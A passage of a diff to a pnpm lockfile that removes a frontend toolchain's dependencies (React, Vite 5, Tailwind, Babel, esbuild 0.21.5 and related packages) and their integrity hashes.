-  readdirp@3.6.0:
-    resolution:
-      {
-        integrity: sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA==,
-      }
-    engines: { node: ">=8.10.0" }
-
-  readdirp@4.1.2:
-    resolution:
-      {
-        integrity: sha512-GDhwkLfywWL2s6vEjyhri+eXmfH6j1L7JE27WhqLeYzoh/A3DBaYGEj2H/HFZCn/kMfim73FXxEJTw06WtxQwg==,
-      }
-    engines: { node: ">= 14.18.0" }
 
   resolve-from@4.0.0:
     resolution:
@@ -3515,14 +2601,6 @@ packages:
       {
         integrity: sha512-seS2Tj26TBVOC2NIc2rOe2y2ZO7efxITtLZcGSOnHHNOQ7CkiUBfw0Iw2ck6xkIhPwLhKNLS8BO+hEpngQlqzw==,
       }
-
-  resolve@1.22.11:
-    resolution:
-      {
-        integrity: sha512-RfqAvLnMl313r7c9oclB1HhUEAezcpLjz95wFH4LVuhk9JF/r22qmVP9AMmOU4vMX7Q8pN8jwNg/CSpdFnMjTQ==,
-      }
-    engines: { node: ">= 0.4" }
-    hasBin: true
 
   restore-cursor@5.1.0:
     resolution:
@@ -3577,19 +2655,6 @@ packages:
         integrity: sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==,
       }
 
-  scheduler@0.23.2:
-    resolution:
-      {
-        integrity: sha512-UOShsPwz7NrMUqhR6t0hWjFduvOzbtv7toDH1/hIrfRNIDBnnBWd0CwJTGvTpngVlmwGCdP9/Zl/tVrDqcuYzQ==,
-      }
-
-  semver@6.3.1:
-    resolution:
-      {
-        integrity: sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==,
-      }
-    hasBin: true
-
   semver@7.7.3:
     resolution:
       {
@@ -3624,12 +2689,6 @@ packages:
         integrity: sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==,
       }
     engines: { node: ">=14" }
-
-  sisteransi@1.0.5:
-    resolution:
-      {
-        integrity: sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==,
-      }
 
   slash@3.0.0:
     resolution:
@@ -3739,14 +2798,6 @@ packages:
       }
     engines: { node: ">=8" }
 
-  sucrase@3.35.1:
-    resolution:
-      {
-        integrity: sha512-DhuTmvZWux4H1UOnWMB3sk0sbaCVOoQZjv8u1rDoTV0HTdGem9hkAZtl4JZy8P2z4Bg0nT+YMeOFyVr4zcG5Tw==,
-      }
-    engines: { node: ">=16 || 14 >=14.17" }
-    hasBin: true
-
   supports-color@7.2.0:
     resolution:
       {
@@ -3754,40 +2805,12 @@ packages:
       }
     engines: { node: ">=8" }
 
-  supports-preserve-symlinks-flag@1.0.0:
-    resolution:
-      {
-        integrity: sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==,
-      }
-    engines: { node: ">= 0.4" }
-
-  tailwindcss@3.4.19:
-    resolution:
-      {
-        integrity: sha512-3ofp+LL8E+pK/JuPLPggVAIaEuhvIz4qNcf3nA1Xn2o/7fb7s/TYpHhwGDv1ZU3PkBluUVaF8PyCHcm48cKLWQ==,
-      }
-    engines: { node: ">=14.0.0" }
-    hasBin: true
-
   term-size@2.2.1:
     resolution:
       {
         integrity: sha512-wK0Ri4fOGjv/XPy8SBHZChl8CM7uMc5VML7SqiQ0zG7+J5Vr+RMQDoHa2CNT6KHUnTGIXH34UDMkPzAUyapBZg==,
       }
     engines: { node: ">=8" }
-
-  thenify-all@1.6.0:
-    resolution:
-      {
-        integrity: sha512-RNxQH/qI8/t3thXJDwcstUO4zeqo64+Uy/+sNVRBx4Xn2OX+OZ9oP+iJnNFqplFra2ZUVeKCSa2oVWi3T4uVmA==,
-      }
-    engines: { node: ">=0.8" }
-
-  thenify@3.3.1:
-    resolution:
-      {
-        integrity: sha512-RVZSIV5IG10Hk3enotrhvz0T9em6cyHBLkH/YAZuKqd8hRkKhSfCGIcP2KUY0EPxndzANBmNllzWPwak+bheSw==,
-      }
 
   tinybench@2.9.0:
     resolution:
@@ -3829,12 +2852,6 @@ packages:
         integrity: sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==,
       }
 
-  tree-sitter-wasms@0.1.13:
-    resolution:
-      {
-        integrity: sha512-wT+cR6DwaIz80/vho3AvSF0N4txuNx/5bcRKoXouOfClpxh/qqrF4URNLQXbbt8MaAxeksZcZd1j8gcGjc+QxQ==,
-      }
-
   ts-api-utils@2.4.0:
     resolution:
       {
@@ -3843,12 +2860,6 @@ packages:
     engines: { node: ">=18.12" }
     peerDependencies:
       typescript: ">=4.8.4"
-
-  ts-interface-checker@0.1.13:
-    resolution:
-      {
-        integrity: sha512-Y/arvbn+rrz3JCKl9C4kVNfTfSm2/mEp5FSz5EsZSANGPSlQrpRI5M4PKF+mJnE52jOO90PnPSc3Ur3bTQw0gA==,
-      }
 
   tsx@4.21.0:
     resolution:
@@ -3957,60 +2968,11 @@ packages:
       }
     engines: { node: ">= 4.0.0" }
 
-  update-browserslist-db@1.2.3:
-    resolution:
-      {
-        integrity: sha512-Js0m9cx+qOgDxo0eMiFGEueWztz+d4+M3rGlmKPT+T4IS/jP4ylw3Nwpu6cpTTP8R1MAC1kF4VbdLt3ARf209w==,
-      }
-    hasBin: true
-    peerDependencies:
-      browserslist: ">= 4.21.0"
-
   uri-js@4.4.1:
     resolution:
       {
         integrity: sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==,
       }
-
-  util-deprecate@1.0.2:
-    resolution:
-      {
-        integrity: sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==,
-      }
-
-  vite@5.4.21:
-    resolution:
-      {
-        integrity: sha512-o5a9xKjbtuhY6Bi5S3+HvbRERmouabWbyUcpXXUA1u+GNUKoROi9byOJ8M0nHbHYHkYICiMlqxkg1KkYmm25Sw==,
-      }
-    engines: { node: ^18.0.0 || >=20.0.0 }
-    hasBin: true
-    peerDependencies:
-      "@types/node": ^18.0.0 || >=20.0.0
-      less: "*"
-      lightningcss: ^1.21.0
-      sass: "*"
-      sass-embedded: "*"
-      stylus: "*"
-      sugarss: "*"
-      terser: ^5.4.0
-    peerDependenciesMeta:
-      "@types/node":
-        optional: true
-      less:
-        optional: true
-      lightningcss:
-        optional: true
-      sass:
-        optional: true
-      sass-embedded:
-        optional: true
-      stylus:
-        optional: true
-      sugarss:
-        optional: true
-      terser:
-        optional: true
 
   vite@7.3.0:
     resolution:
@@ -4106,12 +3068,6 @@ packages:
       }
     engines: { node: ">= 14" }
 
-  web-tree-sitter@0.26.3:
-    resolution:
-      {
-        integrity: sha512-JIVgIKFS1w6lejxSntCtsS/QsE/ecTS00en809cMxMPxaor6MvUnQ+ovG8uTTTvQCFosSh4MeDdI5bSGw5SoBw==,
-      }
-
   webidl-conversions@3.0.1:
     resolution:
       {
@@ -4183,12 +3139,6 @@ packages:
       utf-8-validate:
         optional: true
 
-  yallist@3.1.1:
-    resolution:
-      {
-        integrity: sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==,
-      }
-
   yaml@2.8.2:
     resolution:
       {
@@ -4211,8 +3161,6 @@ packages:
       }
 
 snapshots:
-  "@alloc/quick-lru@5.2.0": {}
-
   "@anthropic-ai/sdk@0.20.9":
     dependencies:
       "@types/node": 18.19.130
@@ -4226,114 +3174,15 @@ snapshots:
     transitivePeerDependencies:
       - encoding
 
-  "@babel/code-frame@7.27.1":
-    dependencies:
-      "@babel/helper-validator-identifier": 7.28.5
-      js-tokens: 4.0.0
-      picocolors: 1.1.1
-
-  "@babel/compat-data@7.28.5": {}
-
-  "@babel/core@7.28.5":
-    dependencies:
-      "@babel/code-frame": 7.27.1
-      "@babel/generator": 7.28.5
-      "@babel/helper-compilation-targets": 7.27.2
-      "@babel/helper-module-transforms": 7.28.3(@babel/core@7.28.5)
-      "@babel/helpers": 7.28.4
-      "@babel/parser": 7.28.5
-      "@babel/template": 7.27.2
-      "@babel/traverse": 7.28.5
-      "@babel/types": 7.28.5
-      "@jridgewell/remapping": 2.3.5
-      convert-source-map: 2.0.0
-      debug: 4.4.3
-      gensync: 1.0.0-beta.2
-      json5: 2.2.3
-      semver: 6.3.1
-    transitivePeerDependencies:
-      - supports-color
-
-  "@babel/generator@7.28.5":
-    dependencies:
-      "@babel/parser": 7.28.5
-      "@babel/types": 7.28.5
-      "@jridgewell/gen-mapping": 0.3.13
-      "@jridgewell/trace-mapping": 0.3.31
-      jsesc: 3.1.0
-
-  "@babel/helper-compilation-targets@7.27.2":
-    dependencies:
-      "@babel/compat-data": 7.28.5
-      "@babel/helper-validator-option": 7.27.1
-      browserslist: 4.28.1
-      lru-cache: 5.1.1
-      semver: 6.3.1
-
-  "@babel/helper-globals@7.28.0": {}
-
-  "@babel/helper-module-imports@7.27.1":
-    dependencies:
-      "@babel/traverse": 7.28.5
-      "@babel/types": 7.28.5
-    transitivePeerDependencies:
-      - supports-color
-
-  "@babel/helper-module-transforms@7.28.3(@babel/core@7.28.5)":
-    dependencies:
-      "@babel/core": 7.28.5
-      "@babel/helper-module-imports": 7.27.1
-      "@babel/helper-validator-identifier": 7.28.5
-      "@babel/traverse": 7.28.5
-    transitivePeerDependencies:
-      - supports-color
-
-  "@babel/helper-plugin-utils@7.27.1": {}
-
   "@babel/helper-string-parser@7.27.1": {}
 
   "@babel/helper-validator-identifier@7.28.5": {}
-
-  "@babel/helper-validator-option@7.27.1": {}
-
-  "@babel/helpers@7.28.4":
-    dependencies:
-      "@babel/template": 7.27.2
-      "@babel/types": 7.28.5
 
   "@babel/parser@7.28.5":
     dependencies:
       "@babel/types": 7.28.5
 
-  "@babel/plugin-transform-react-jsx-self@7.27.1(@babel/core@7.28.5)":
-    dependencies:
-      "@babel/core": 7.28.5
-      "@babel/helper-plugin-utils": 7.27.1
-
-  "@babel/plugin-transform-react-jsx-source@7.27.1(@babel/core@7.28.5)":
-    dependencies:
-      "@babel/core": 7.28.5
-      "@babel/helper-plugin-utils": 7.27.1
-
   "@babel/runtime@7.28.4": {}
-
-  "@babel/template@7.27.2":
-    dependencies:
-      "@babel/code-frame": 7.27.1
-      "@babel/parser": 7.28.5
-      "@babel/types": 7.28.5
-
-  "@babel/traverse@7.28.5":
-    dependencies:
-      "@babel/code-frame": 7.27.1
-      "@babel/generator": 7.28.5
-      "@babel/helper-globals": 7.28.0
-      "@babel/parser": 7.28.5
-      "@babel/template": 7.27.2
-      "@babel/types": 7.28.5
-      debug: 4.4.3
-    transitivePeerDependencies:
-      - supports-color
 
   "@babel/types@7.28.5":
     dependencies:
@@ -4501,103 +3350,52 @@ snapshots:
       human-id: 4.1.3
       prettier: 2.8.8
 
-  "@esbuild/aix-ppc64@0.21.5":
-    optional: true
-
   "@esbuild/aix-ppc64@0.27.2":
-    optional: true
-
-  "@esbuild/android-arm64@0.21.5":
     optional: true
 
   "@esbuild/android-arm64@0.27.2":
     optional: true
 
-  "@esbuild/android-arm@0.21.5":
-    optional: true
-
   "@esbuild/android-arm@0.27.2":
-    optional: true
-
-  "@esbuild/android-x64@0.21.5":
     optional: true
 
   "@esbuild/android-x64@0.27.2":
     optional: true
 
-  "@esbuild/darwin-arm64@0.21.5":
-    optional: true
-
   "@esbuild/darwin-arm64@0.27.2":
-    optional: true
-
-  "@esbuild/darwin-x64@0.21.5":
     optional: true
 
   "@esbuild/darwin-x64@0.27.2":
     optional: true
 
-  "@esbuild/freebsd-arm64@0.21.5":
-    optional: true
-
   "@esbuild/freebsd-arm64@0.27.2":
-    optional: true
-
-  "@esbuild/freebsd-x64@0.21.5":
     optional: true
 
   "@esbuild/freebsd-x64@0.27.2":
     optional: true
 
-  "@esbuild/linux-arm64@0.21.5":
-    optional: true
-
   "@esbuild/linux-arm64@0.27.2":
-    optional: true
-
-  "@esbuild/linux-arm@0.21.5":
     optional: true
 
   "@esbuild/linux-arm@0.27.2":
     optional: true
 
-  "@esbuild/linux-ia32@0.21.5":
-    optional: true
-
   "@esbuild/linux-ia32@0.27.2":
-    optional: true
-
-  "@esbuild/linux-loong64@0.21.5":
     optional: true
 
   "@esbuild/linux-loong64@0.27.2":
     optional: true
 
-  "@esbuild/linux-mips64el@0.21.5":
-    optional: true
-
   "@esbuild/linux-mips64el@0.27.2":
-    optional: true
-
-  "@esbuild/linux-ppc64@0.21.5":
     optional: true
 
   "@esbuild/linux-ppc64@0.27.2":
     optional: true
 
-  "@esbuild/linux-riscv64@0.21.5":
-    optional: true
-
   "@esbuild/linux-riscv64@0.27.2":
     optional: true
 
-  "@esbuild/linux-s390x@0.21.5":
-    optional: true
-
   "@esbuild/linux-s390x@0.27.2":
-    optional: true
-
-  "@esbuild/linux-x64@0.21.5":
     optional: true
 
   "@esbuild/linux-x64@0.27.2":
@@ -4606,16 +3404,10 @@ snapshots:
   "@esbuild/netbsd-arm64@0.27.2":
     optional: true
 
-  "@esbuild/netbsd-x64@0.21.5":
-    optional: true
-
   "@esbuild/netbsd-x64@0.27.2":
     optional: true
 
   "@esbuild/openbsd-arm64@0.27.2":
-    optional: true
-
-  "@esbuild/openbsd-x64@0.21.5":
     optional: true
 
   "@esbuild/openbsd-x64@0.27.2":
@@ -4624,25 +3416,13 @@ snapshots:
   "@esbuild/openharmony-arm64@0.27.2":
     optional: true
 
-  "@esbuild/sunos-x64@0.21.5":
-    optional: true
-
   "@esbuild/sunos-x64@0.27.2":
-    optional: true
-
-  "@esbuild/win32-arm64@0.21.5":
     optional: true
 
   "@esbuild/win32-arm64@0.27.2":
     optional: true
 
-  "@esbuild/win32-ia32@0.21.5":
-    optional: true
-
   "@esbuild/win32-ia32@0.27.2":
-    optional: true
-
-  "@esbuild/win32-x64@0.21.5":
     optional: true
 
   "@esbuild/win32-x64@0.27.2":
@@ -4721,12 +3501,6 @@ snapshots:
     optionalDependencies:
       "@types/node": 22.19.3
 
-  "@isaacs/balanced-match@4.0.1": {}
-
-  "@isaacs/brace-expansion@5.0.0":
-    dependencies:
-      "@isaacs/balanced-match": 4.0.1
-
   "@isaacs/cliui@8.0.2":
     dependencies:
       string-width: 5.1.2
@@ -4735,16 +3509,6 @@ snapshots:
       strip-ansi-cjs: strip-ansi@6.0.1
       wrap-ansi: 8.1.0
       wrap-ansi-cjs: wrap-ansi@7.0.0
-
-  "@jridgewell/gen-mapping@0.3.13":
-    dependencies:
-      "@jridgewell/sourcemap-codec": 1.5.5
-      "@jridgewell/trace-mapping": 0.3.31
-
-  "@jridgewell/remapping@2.3.5":
-    dependencies:
-      "@jridgewell/gen-mapping": 0.3.13
-      "@jridgewell/trace-mapping": 0.3.31
 
   "@jridgewell/resolve-uri@3.1.2": {}
 
@@ -4785,8 +3549,6 @@ snapshots:
 
   "@pkgjs/parseargs@0.11.0":
     optional: true
-
-  "@rolldown/pluginutils@1.0.0-beta.27": {}
 
   "@rollup/rollup-android-arm-eabi@4.55.1":
     optional: true
@@ -4865,29 +3627,6 @@ snapshots:
 
   "@standard-schema/spec@1.1.0": {}
 
-  "@types/babel__core@7.20.5":
-    dependencies:
-      "@babel/parser": 7.28.5
-      "@babel/types": 7.28.5
-      "@types/babel__generator": 7.27.0
-      "@types/babel__template": 7.4.4
-      "@types/babel__traverse": 7.28.0
-
-  "@types/babel__generator@7.27.0":
-    dependencies:
-      "@babel/types": 7.28.5
-
-  "@types/babel__template@7.4.4":
-    dependencies:
-      "@babel/parser": 7.28.5
-      "@babel/types": 7.28.5
-
-  "@types/babel__traverse@7.28.0":
-    dependencies:
-      "@babel/types": 7.28.5
-
-  "@types/braces@3.0.5": {}
-
   "@types/chai@5.2.3":
     dependencies:
       "@types/deep-eql": 4.0.2
@@ -4898,10 +3637,6 @@ snapshots:
   "@types/estree@1.0.8": {}
 
   "@types/json-schema@7.0.15": {}
-
-  "@types/micromatch@4.0.10":
-    dependencies:
-      "@types/braces": 3.0.5
 
   "@types/node-fetch@2.6.13":
     dependencies:
@@ -4921,22 +3656,7 @@ snapshots:
   "@types/node@22.19.3":
     dependencies:
       undici-types: 6.21.0
-
-  "@types/prompts@2.4.9":
-    dependencies:
-      "@types/node": 22.19.3
-      kleur: 3.0.3
-
-  "@types/prop-types@15.7.15": {}
-
-  "@types/react-dom@18.3.7(@types/react@18.3.27)":
-    dependencies:
-      "@types/react": 18.3.27
-
-  "@types/react@18.3.27":
-    dependencies:
-      "@types/prop-types": 15.7.15
-      csstype: 3.2.3
+    optional: true
 
   "@typescript-eslint/eslint-plugin@8.52.0(@typescript-eslint/parser@8.52.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.3))(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.3)":
     dependencies:
@@ -5029,18 +3749,6 @@ snapshots:
       "@typescript-eslint/types": 8.52.0
       eslint-visitor-keys: 4.2.1
 
-  "@vitejs/plugin-react@4.7.0(vite@5.4.21(@types/node@22.19.3))":
-    dependencies:
-      "@babel/core": 7.28.5
-      "@babel/plugin-transform-react-jsx-self": 7.27.1(@babel/core@7.28.5)
-      "@babel/plugin-transform-react-jsx-source": 7.27.1(@babel/core@7.28.5)
-      "@rolldown/pluginutils": 1.0.0-beta.27
-      "@types/babel__core": 7.20.5
-      react-refresh: 0.17.0
-      vite: 5.4.21(@types/node@22.19.3)
-    transitivePeerDependencies:
-      - supports-color
-
   "@vitest/coverage-v8@4.0.16(vitest@4.0.16(@types/node@20.19.27)(jiti@1.21.7)(tsx@4.21.0)(yaml@2.8.2))":
     dependencies:
       "@bcoe/v8-coverage": 1.0.2
@@ -5074,14 +3782,6 @@ snapshots:
       magic-string: 0.30.21
     optionalDependencies:
       vite: 7.3.0(@types/node@20.19.27)(jiti@1.21.7)(tsx@4.21.0)(yaml@2.8.2)
-
-  "@vitest/mocker@4.0.16(vite@7.3.0(@types/node@22.19.3)(jiti@1.21.7)(tsx@4.21.0)(yaml@2.8.2))":
-    dependencies:
-      "@vitest/spy": 4.0.16
-      estree-walker: 3.0.3
-      magic-string: 0.30.21
-    optionalDependencies:
-      vite: 7.3.0(@types/node@22.19.3)(jiti@1.21.7)(tsx@4.21.0)(yaml@2.8.2)
 
   "@vitest/pretty-format@4.0.16":
     dependencies:
@@ -5144,15 +3844,6 @@ snapshots:
 
   ansi-styles@6.2.3: {}
 
-  any-promise@1.3.0: {}
-
-  anymatch@3.1.3:
-    dependencies:
-      normalize-path: 3.0.0
-      picomatch: 2.3.1
-
-  arg@5.0.2: {}
-
   argparse@1.0.10:
     dependencies:
       sprintf-js: 1.0.3
@@ -5171,28 +3862,15 @@ snapshots:
 
   asynckit@0.4.0: {}
 
-  autoprefixer@10.4.23(postcss@8.5.6):
-    dependencies:
-      browserslist: 4.28.1
-      caniuse-lite: 1.0.30001762
-      fraction.js: 5.3.4
-      picocolors: 1.1.1
-      postcss: 8.5.6
-      postcss-value-parser: 4.2.0
-
   balanced-match@1.0.2: {}
 
   base64-js@1.5.1: {}
-
-  baseline-browser-mapping@2.9.11: {}
 
   better-path-resolve@1.0.0:
     dependencies:
       is-windows: 1.0.2
 
   bignumber.js@9.3.1: {}
-
-  binary-extensions@2.3.0: {}
 
   brace-expansion@1.1.12:
     dependencies:
@@ -5207,14 +3885,6 @@ snapshots:
     dependencies:
       fill-range: 7.1.1
 
-  browserslist@4.28.1:
-    dependencies:
-      baseline-browser-mapping: 2.9.11
-      caniuse-lite: 1.0.30001762
-      electron-to-chromium: 1.5.267
-      node-releases: 2.0.27
-      update-browserslist-db: 1.2.3(browserslist@4.28.1)
-
   buffer-equal-constant-time@1.0.1: {}
 
   call-bind-apply-helpers@1.0.2:
@@ -5224,10 +3894,6 @@ snapshots:
 
   callsites@3.1.0: {}
 
-  camelcase-css@2.0.1: {}
-
-  caniuse-lite@1.0.30001762: {}
-
   chai@6.2.2: {}
 
   chalk@4.1.2:
@@ -5236,22 +3902,6 @@ snapshots:
       supports-color: 7.2.0
 
   chardet@2.1.1: {}
-
-  chokidar@3.6.0:
-    dependencies:
-      anymatch: 3.1.3
-      braces: 3.0.3
-      glob-parent: 5.1.2
-      is-binary-path: 2.1.0
-      is-glob: 4.0.3
-      normalize-path: 3.0.0
-      readdirp: 3.6.0
-    optionalDependencies:
-      fsevents: 2.3.3
-
-  chokidar@4.0.3:
-    dependencies:
-      readdirp: 4.1.2
 
   ci-info@3.9.0: {}
 
@@ -5278,21 +3928,13 @@ snapshots:
 
   commander@14.0.2: {}
 
-  commander@4.1.1: {}
-
   concat-map@0.0.1: {}
-
-  convert-source-map@2.0.0: {}
 
   cross-spawn@7.0.6:
     dependencies:
       path-key: 3.1.1
       shebang-command: 2.0.0
       which: 2.0.2
-
-  cssesc@3.0.0: {}
-
-  csstype@3.2.3: {}
 
   data-uri-to-buffer@4.0.1: {}
 
@@ -5308,13 +3950,9 @@ snapshots:
 
   detect-indent@6.1.0: {}
 
-  didyoumean@1.2.2: {}
-
   dir-glob@3.0.1:
     dependencies:
       path-type: 4.0.0
-
-  dlv@1.1.3: {}
 
   dotenv@8.6.0: {}
 
@@ -5329,8 +3967,6 @@ snapshots:
   ecdsa-sig-formatter@1.0.11:
     dependencies:
       safe-buffer: 5.2.1
-
-  electron-to-chromium@1.5.267: {}
 
   emoji-regex@10.6.0: {}
 
@@ -5362,32 +3998,6 @@ snapshots:
       has-tostringtag: 1.0.2
       hasown: 2.0.2
 
-  esbuild@0.21.5:
-    optionalDependencies:
-      "@esbuild/aix-ppc64": 0.21.5
-      "@esbuild/android-arm": 0.21.5
-      "@esbuild/android-arm64": 0.21.5
-      "@esbuild/android-x64": 0.21.5
-      "@esbuild/darwin-arm64": 0.21.5
-      "@esbuild/darwin-x64": 0.21.5
-      "@esbuild/freebsd-arm64": 0.21.5
-      "@esbuild/freebsd-x64": 0.21.5
-      "@esbuild/linux-arm": 0.21.5
-      "@esbuild/linux-arm64": 0.21.5
-      "@esbuild/linux-ia32": 0.21.5
-      "@esbuild/linux-loong64": 0.21.5
-      "@esbuild/linux-mips64el": 0.21.5
-      "@esbuild/linux-ppc64": 0.21.5
-      "@esbuild/linux-riscv64": 0.21.5
-      "@esbuild/linux-s390x": 0.21.5
-      "@esbuild/linux-x64": 0.21.5
-      "@esbuild/netbsd-x64": 0.21.5
-      "@esbuild/openbsd-x64": 0.21.5
-      "@esbuild/sunos-x64": 0.21.5
-      "@esbuild/win32-arm64": 0.21.5
-      "@esbuild/win32-ia32": 0.21.5
-      "@esbuild/win32-x64": 0.21.5
-
   esbuild@0.27.2:
     optionalDependencies:
       "@esbuild/aix-ppc64": 0.27.2
@@ -5416,8 +4026,6 @@ snapshots:
       "@esbuild/win32-arm64": 0.27.2
       "@esbuild/win32-ia32": 0.27.2
       "@esbuild/win32-x64": 0.27.2
-
-  escalade@3.2.0: {}
 
   escape-string-regexp@4.0.0: {}
 
@@ -5581,8 +4189,6 @@ snapshots:
     dependencies:
       fetch-blob: 3.2.0
 
-  fraction.js@5.3.4: {}
-
   fs-extra@7.0.1:
     dependencies:
       graceful-fs: 4.2.11
@@ -5616,8 +4222,6 @@ snapshots:
       json-bigint: 1.0.0
     transitivePeerDependencies:
       - supports-color
-
-  gensync@1.0.0-beta.2: {}
 
   get-east-asian-width@1.4.0: {}
 
@@ -5659,15 +4263,6 @@ snapshots:
       minipass: 7.1.2
       package-json-from-dist: 1.0.1
       path-scurry: 1.11.1
-
-  glob@11.1.0:
-    dependencies:
-      foreground-child: 3.3.1
-      jackspeak: 4.1.1
-      minimatch: 10.1.1
-      minipass: 7.1.2
-      package-json-from-dist: 1.0.1
-      path-scurry: 2.0.1
 
   globals@14.0.0: {}
 
@@ -5749,14 +4344,6 @@ snapshots:
 
   imurmurhash@0.1.4: {}
 
-  is-binary-path@2.1.0:
-    dependencies:
-      binary-extensions: 2.3.0
-
-  is-core-module@2.16.1:
-    dependencies:
-      hasown: 2.0.2
-
   is-extglob@2.1.1: {}
 
   is-fullwidth-code-point@3.0.0: {}
@@ -5806,13 +4393,8 @@ snapshots:
     optionalDependencies:
       "@pkgjs/parseargs": 0.11.0
 
-  jackspeak@4.1.1:
-    dependencies:
-      "@isaacs/cliui": 8.0.2
-
-  jiti@1.21.7: {}
-
-  js-tokens@4.0.0: {}
+  jiti@1.21.7:
+    optional: true
 
   js-tokens@9.0.1: {}
 
@@ -5825,8 +4407,6 @@ snapshots:
     dependencies:
       argparse: 2.0.1
 
-  jsesc@3.1.0: {}
-
   json-bigint@1.0.0:
     dependencies:
       bignumber.js: 9.3.1
@@ -5836,8 +4416,6 @@ snapshots:
   json-schema-traverse@0.4.1: {}
 
   json-stable-stringify-without-jsonify@1.0.1: {}
-
-  json5@2.2.3: {}
 
   jsonfile@4.0.0:
     optionalDependencies:
@@ -5858,16 +4436,10 @@ snapshots:
     dependencies:
       json-buffer: 3.0.1
 
-  kleur@3.0.3: {}
-
   levn@0.4.1:
     dependencies:
       prelude-ls: 1.2.1
       type-check: 0.4.0
-
-  lilconfig@3.1.3: {}
-
-  lines-and-columns@1.2.4: {}
 
   lint-staged@16.2.7:
     dependencies:
@@ -5908,17 +4480,7 @@ snapshots:
       strip-ansi: 7.1.2
       wrap-ansi: 9.0.2
 
-  loose-envify@1.4.0:
-    dependencies:
-      js-tokens: 4.0.0
-
   lru-cache@10.4.3: {}
-
-  lru-cache@11.2.4: {}
-
-  lru-cache@5.1.1:
-    dependencies:
-      yallist: 3.1.1
 
   magic-string@0.30.21:
     dependencies:
@@ -5951,10 +4513,6 @@ snapshots:
 
   mimic-function@5.0.1: {}
 
-  minimatch@10.1.1:
-    dependencies:
-      "@isaacs/brace-expansion": 5.0.0
-
   minimatch@3.1.2:
     dependencies:
       brace-expansion: 1.1.12
@@ -5968,12 +4526,6 @@ snapshots:
   mri@1.2.0: {}
 
   ms@2.1.3: {}
-
-  mz@2.7.0:
-    dependencies:
-      any-promise: 1.3.0
-      object-assign: 4.1.1
-      thenify-all: 1.6.0
 
   nano-spawn@2.0.0: {}
 
@@ -5992,14 +4544,6 @@ snapshots:
       data-uri-to-buffer: 4.0.1
       fetch-blob: 3.2.0
       formdata-polyfill: 4.0.10
-
-  node-releases@2.0.27: {}
-
-  normalize-path@3.0.0: {}
-
-  object-assign@4.1.1: {}
-
-  object-hash@3.0.0: {}
 
   obug@2.1.1: {}
 
@@ -6071,16 +4615,9 @@ snapshots:
 
   path-key@3.1.1: {}
 
-  path-parse@1.0.7: {}
-
   path-scurry@1.11.1:
     dependencies:
       lru-cache: 10.4.3
-      minipass: 7.1.2
-
-  path-scurry@2.0.1:
-    dependencies:
-      lru-cache: 11.2.4
       minipass: 7.1.2
 
   path-type@4.0.0: {}
@@ -6095,44 +4632,7 @@ snapshots:
 
   pidtree@0.6.0: {}
 
-  pify@2.3.0: {}
-
   pify@4.0.1: {}
-
-  pirates@4.0.7: {}
-
-  postcss-import@15.1.0(postcss@8.5.6):
-    dependencies:
-      postcss: 8.5.6
-      postcss-value-parser: 4.2.0
-      read-cache: 1.0.0
-      resolve: 1.22.11
-
-  postcss-js@4.1.0(postcss@8.5.6):
-    dependencies:
-      camelcase-css: 2.0.1
-      postcss: 8.5.6
-
-  postcss-load-config@6.0.1(jiti@1.21.7)(postcss@8.5.6)(tsx@4.21.0)(yaml@2.8.2):
-    dependencies:
-      lilconfig: 3.1.3
-    optionalDependencies:
-      jiti: 1.21.7
-      postcss: 8.5.6
-      tsx: 4.21.0
-      yaml: 2.8.2
-
-  postcss-nested@6.2.0(postcss@8.5.6):
-    dependencies:
-      postcss: 8.5.6
-      postcss-selector-parser: 6.1.2
-
-  postcss-selector-parser@6.1.2:
-    dependencies:
-      cssesc: 3.0.0
-      util-deprecate: 1.0.2
-
-  postcss-value-parser@4.2.0: {}
 
   postcss@8.5.6:
     dependencies:
@@ -6144,32 +4644,11 @@ snapshots:
 
   prettier@2.8.8: {}
 
-  prompts@2.4.2:
-    dependencies:
-      kleur: 3.0.3
-      sisteransi: 1.0.5
-
   punycode@2.3.1: {}
 
   quansync@0.2.11: {}
 
   queue-microtask@1.2.3: {}
-
-  react-dom@18.3.1(react@18.3.1):
-    dependencies:
-      loose-envify: 1.4.0
-      react: 18.3.1
-      scheduler: 0.23.2
-
-  react-refresh@0.17.0: {}
-
-  react@18.3.1:
-    dependencies:
-      loose-envify: 1.4.0
-
-  read-cache@1.0.0:
-    dependencies:
-      pify: 2.3.0
 
   read-yaml-file@1.1.0:
     dependencies:
@@ -6178,23 +4657,11 @@ snapshots:
       pify: 4.0.1
       strip-bom: 3.0.0
 
-  readdirp@3.6.0:
-    dependencies:
-      picomatch: 2.3.1
-
-  readdirp@4.1.2: {}
-
   resolve-from@4.0.0: {}
 
   resolve-from@5.0.0: {}
 
   resolve-pkg-maps@1.0.0: {}
-
-  resolve@1.22.11:
-    dependencies:
-      is-core-module: 2.16.1
-      path-parse: 1.0.7
-      supports-preserve-symlinks-flag: 1.0.0
 
